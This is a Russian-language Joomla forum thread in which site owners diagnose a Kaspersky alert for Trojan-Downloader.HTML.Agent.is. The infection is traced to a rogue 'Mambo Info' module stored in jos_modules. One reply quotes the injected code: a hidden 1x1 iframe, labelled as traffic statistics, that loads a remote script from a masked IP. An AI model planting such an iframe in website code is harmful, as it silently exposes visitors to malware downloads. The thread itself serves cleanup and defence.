0 Пользователей и 1 Гость просматривают эту тему.
  • 6 Ответов
  • 3976 Просмотров
*

Do_it

  • Новичок
  • 4
  • 0 / 0
При заходе на сайт Касперский начинает визжать (Веб-антивирус) что обнаружена троянская программа  Trojan-Downloader.HTML.Agent.is  файл     http://XX.xxx.x.xxx/iframe/wp-stats.php  .
   >:(
Как излечится?   !!!???!!!

[вложение удалено Администратором]
*

Abnormal

  • Осваиваюсь на форуме
  • 37
  • 2 / 0
Проверить исходный код файлов index.html index.php на наличие вредоносной программы (обычно в самом конце файла)

много интересного и полезного прочитаете здесь http://joomlaforum.ru/index.php/board,104.0.html
*

mijsvit

  • Захожу иногда
  • 137
  • 7 / 0
Можно еще все это дело архивчиком скачать и локально на компьютере проверить какой именно файл заражен..
*

Do_it

  • Новичок
  • 4
  • 0 / 0
Выяснил что после удаления/коментирования  mosLoadModules ( 'left', -2 ); каспер прекращает орать. т.е. вроди бы все норм отправился в модули и нашел :  Mambo Info           Public  left  На всех  61  -Самописный- 
отменил публикацию каспер перестал реагировать.
Что это за модуль кто нибуть знает? стал заходить в него (настройки этого  модуля) о5 каспер среагировал . В настройках пишет суффикс класса модуля vvbbnn33 как раз такое же название класса  дива что и на страничке в котором(в диве) находится эта злосчастная ссылка. в установке модулей мудуль не нашел .
*

Dexter

  • Осваиваюсь на форуме
  • 16
  • 0 / 1
Тоже на днях обнаружил подобный модуль в одном из своих сайтов

"Mambo Info"
<!-- Traffic Statistics --> <iframe src=http://ХХ.ХХХ.Х.ХХХ/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

Касперский визжал на страницах.

Тип модуля "User", т.е. как буд-то я самостоятельно создал этот модуль.
css class vvbbnn33

Испытывать на себе не стал возможности червя. На сайте Касперского и в инете ни чего не нашел.
Вот только на одном из буржуйских форумов http://forum.joomla.org/viewtopic.php?f=267&p=1364424
только абсолютно ни чего не понял. В общем от куда взялся не понятно. Если есть у кого инфа отпишите.
*

Dexter

  • Осваиваюсь на форуме
  • 16
  • 0 / 1
Тут http://joomlaforum.ru/index.php/topic,37844.0.html
оказывается тоже обсуждается подобная проблема
*

sh2sh

  • Новичок
  • 3
  • 0 / 0
Ага, пишется в базу в jos_modules
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 792
Просмотров: 277817
Последний ответ 23.02.2020, 21:18:16
от draff
Папки html в папках с шаблонами

Автор mariale2674

Ответов: 4
Просмотров: 889
Последний ответ 27.01.2019, 10:33:27
от wishlight
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 2434
Последний ответ 14.07.2017, 17:31:00
от voland
Обноружен Swf.Exploit.CVE_2016_0995-1 на сайте, что делать?

Автор Elimelech

Ответов: 1
Просмотров: 1124
Последний ответ 29.04.2017, 11:26:44
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

Ответов: 28
Просмотров: 1557
Последний ответ 20.02.2017, 20:18:44
от flyingspook